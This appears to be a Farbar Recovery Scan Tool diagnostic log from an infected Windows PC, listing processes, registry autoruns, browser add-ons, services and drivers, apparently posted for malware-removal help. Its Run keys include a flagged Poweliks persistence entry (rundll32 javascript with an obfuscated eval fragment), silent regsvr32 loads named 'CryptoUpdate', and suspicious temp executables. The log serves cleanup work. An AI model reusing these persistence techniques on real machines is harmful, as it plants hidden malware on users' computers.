C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Qualcomm Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe () C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe (Microsoft Corporation) C:\Windows\System32\dasHost.exe (iolo technologies, LLC) C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe (iolo technologies, LLC) C:\Program Files (x86)\iolo\System Mechanic Professional\LiveBoost.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (iolo technologies, LLC) C:\Program Files (x86)\iolo\System Mechanic Professional\ioloGovernor64.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (Qualcomm Atheros) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtTray.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Hauppauge Computer Works, Inc.) C:\Program Files (x86)\WinTV\WinTV7\WinTVTray.exe () C:\Program Files (x86)\Roxio 2012\5.0\CPMonitor.exe (Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\AllShare\AllShareAgent.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe (Dell Products, LP.) 
C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe (Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\AllShare\AllShareDMS\AllShareDMS.exe (SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe (SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe (SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe (Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe (Microsoft Corporation) C:\Windows\System32\Taskmgr.exe (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (ArcSoft, Inc.) C:\Program Files (x86)\ArcSoft\TotalMedia ShowBiz\TMShowBiz.exe (Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe (RealNetworks, Inc.) 
C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files 
(x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe (Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\CaptureHDPVR.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or 
removed. The file will not be moved.) HKLM\...\Run: [btTray] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtTray.exe [757888 2012-07-02] (Qualcomm Atheros) HKLM\...\Run: [btvStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe [127104 2012-07-02] (Qualcomm Atheros Commnucations) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212560 2012-06-13] (Realtek Semiconductor) HKLM\...\Run: [bCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation) HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1796056 2014-08-19] (NVIDIA Corporation) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [iSUSPM] => C:\ProgramData\FLEXnet\Connect\11\\isuspm.exe [324976 2010-05-21] (Flexera Software, Inc.) HKLM-x32\...\Run: [CPMonitor] => C:\Program Files (x86)\Roxio 2012\5.0\CPMonitor.exe [84464 2011-07-08] () HKLM-x32\...\Run: [AllShareAgent] => C:\Program Files (x86)\Samsung\AllShare\AllShareAgent.exe [285072 2012-03-01] (Samsung Electronics Co., Ltd.) HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.) 
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [4085896 2014-09-23] (AVAST Software) HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\Run: [vmware-unity] => C:\Users\Kulle\AppData\Roaming\vmware-unity.exe HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\Run: [CryptoUpdate] => C:\Windows\system32\regsvr32.exe /s "C:\Users\Kulle\AppData\Roaming\Microsoft\Crypto\RSA\cert_v64_2.tpl" HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-12-03] (Google Inc.) HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\Run: [dosklder] => C:\Users\Kulle\AppData\Local\Temp\ctfminit.exe <===== ATTENTION HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\Run: [a73b28d] => C:\Users\Kulle\AppData\Roaming\a73b28d.exe HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...\RunOnce: [CryptoUpdate] => C:\Windows\system32\regsvr32.exe /s "C:\Users\Kulle\AppData\Roaming\Microsoft\Crypto\RSA\cert_v65_0.tpl" HKU\S-1-5-21-2997053151-1021370575-3583938921-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinTV Recording Status.lnk ShortcutTarget: WinTV Recording Status.lnk -> C:\Program Files (x86)\WinTV\WinTV7\WinTVTray.exe (Hauppauge Computer Works, Inc.) 
ShellIconOverlayIdentifiers: 00avast -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software)
BootExecute: autocheck autochk /p \??\Y:autocheck autochk /m /P \Device\HarddiskVolume17autocheck autochk /m /P \Device\HarddiskVolume16

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com/?fr=fp-yie10
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.yahoo.com/?fr=fp-yie10
URLSearchHook: HKCU - YTNavAssistPlugin Class - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn3\yt.dll (Yahoo! Inc.)
StartMenuInternet: IEXPLORE.EXE - %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
SearchScopes: HKLM - {BC16EF96-1661-4F71-B6D9-3ED7FA2FD127} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MDDCJS
SearchScopes: HKLM-x32 - {BC16EF96-1661-4F71-B6D9-3ED7FA2FD127} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MDDCJS
SearchScopes: HKCU - {58A18107-2583-4955-B7B7-98DEEB51017C} URL = http://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie10
SearchScopes: HKCU - {870653A8-9FC7-4D12-8A65-34EE256D6381} URL = https://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie10
SearchScopes: HKCU - {BC16EF96-1661-4F71-B6D9-3ED7FA2FD127} URL =
SearchScopes: HKCU - {CB60D13D-6D6A-4763-9863-859F795E53C4} URL = http://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKCU - {EC947625-E22A-45ED-BE14-550262FB5BCE} URL = http://delicious.com/search?p={searchTerms}
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Qualcomm Atheros Commnucations)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: No Name -> {300BEC06-B743-4D19-86B9-11DC711D7FFB} -> No File
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
DPF: HKLM-x32 {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds.microsoft.com/FTM/TransferSource/grTransferCtrl.cab
Handler: WSIEChrome - No CLSID Value -
Handler-x32: WSIEChrome - No CLSID Value -
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254

FireFox:
========
FF ProfilePath: C:\Users\Kulle\AppData\Roaming\Mozilla\Firefox\Profiles\7wnw9rol.default
FF Homepage: hxxp://www.yahoo.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_117.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @java.com/DTPlugin,version=10.9.2 -> C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.9.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_117.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @real.com/nppl3260;version=16.0.3.51 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.3.51 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Kulle\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Extension: Yahoo! Toolbar - C:\Users\Kulle\AppData\Roaming\Mozilla\Firefox\Profiles\7wnw9rol.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1} [2014-06-22]
FF Extension: Print / Print Preview (Update) - C:\Users\Kulle\AppData\Roaming\Mozilla\Firefox\Profiles\7wnw9rol.default\Extensions\printprintpreview-andrewsfirefoxextensions@gmail.com.xpi [2013-09-09]
FF HKLM-x32\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5
FF Extension: DivX Plus Web Player HTML5 <video> - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2013-05-25]
FF HKLM-x32\...\Firefox\Extensions: [{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-05-29]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-09-23]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext

Chrome:
=======
CHR Profile: C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-12-03]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-23]
CHR Extension: (YouTube) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-12-03]
CHR Extension: (Google Search) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-12-03]
CHR Extension: (SelectionLinks) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdcnnmifdmlmjffdgeieikcokcogpbej [2013-02-24]
CHR Extension: (Google Wallet) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (DivX Plus Web Player HTML5 <video>) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm [2013-05-25]
CHR Extension: (Gmail) - C:\Users\Kulle\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-12-03]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-09-23]
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-08-14]
CHR HKLM-x32\...\Chrome\Extension: [kdcnnmifdmlmjffdgeieikcokcogpbej] - C:\Program Files (x86)\OApps\chromeaddon2.crx [2012-12-28]
CHR HKLM-x32\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files (x86)\DivX\DivX Plus Web Player\chrome\DivXHTML5\DivXHTML5.crx [2011-05-23]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269; C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [457200 2011-02-09] ()
R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [128640 2012-07-02] (Qualcomm Atheros Commnucations)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-09-23] (AVAST Software)
R2 BOT4Service; C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe [21488 2011-07-15] ()
S4 BOTService; C:\Program Files (x86)\Roxio\BackOnTrack\Instant Restore\BOTService.exe [211440 2011-07-14] (Rovi Corporation)
S2 HauppaugeTVServer; C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe [577536 2013-01-25] (Hauppauge Computer Works) [File not signed]
S3 HcwDevCentralService; C:\Program Files (x86)\Hauppauge\DeviceCentral\HcwDevCentralService.exe [401232 2013-02-07] (Hauppauge Computer Works, Inc.)
R2 IAStorDataMgrSvc; C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [7168 2012-07-09] (Intel Corporation) [File not signed]
R2 ioloSystemService; C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe [4700872 2014-08-12] (iolo technologies, LLC)
S4 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-18] (Intel Corporation)
S3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S2 MSSQLSERVER; c:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [62111072 2011-06-17] (Microsoft Corporation)
S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation)
R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-08-14] ()
S4 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [254512 2012-04-24] ()
S4 RoxMediaDB13; C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [1095664 2011-07-13] (Rovi Corporation)
S4 RoxWatch12; C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe [340976 2011-07-13] (Rovi Corporation)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [1915480 2013-05-23] (SoftThinks SAS)
S4 SQLSERVERAGENT; c:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [431456 2011-06-17] (Microsoft Corporation)
S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16056 2014-03-29] (Microsoft Corporation)
S4 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [77824 2012-06-19] (Atheros) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-09-23] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [79184 2014-09-23] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-09-23] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-09-23] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1041168 2014-09-23] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [427360 2014-09-23] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [92008 2014-09-23] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [224896 2014-09-23] ()
R3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-07-02] (Qualcomm Atheros)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
S3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2012-08-04] (OSR Open Systems Resources, Inc.)
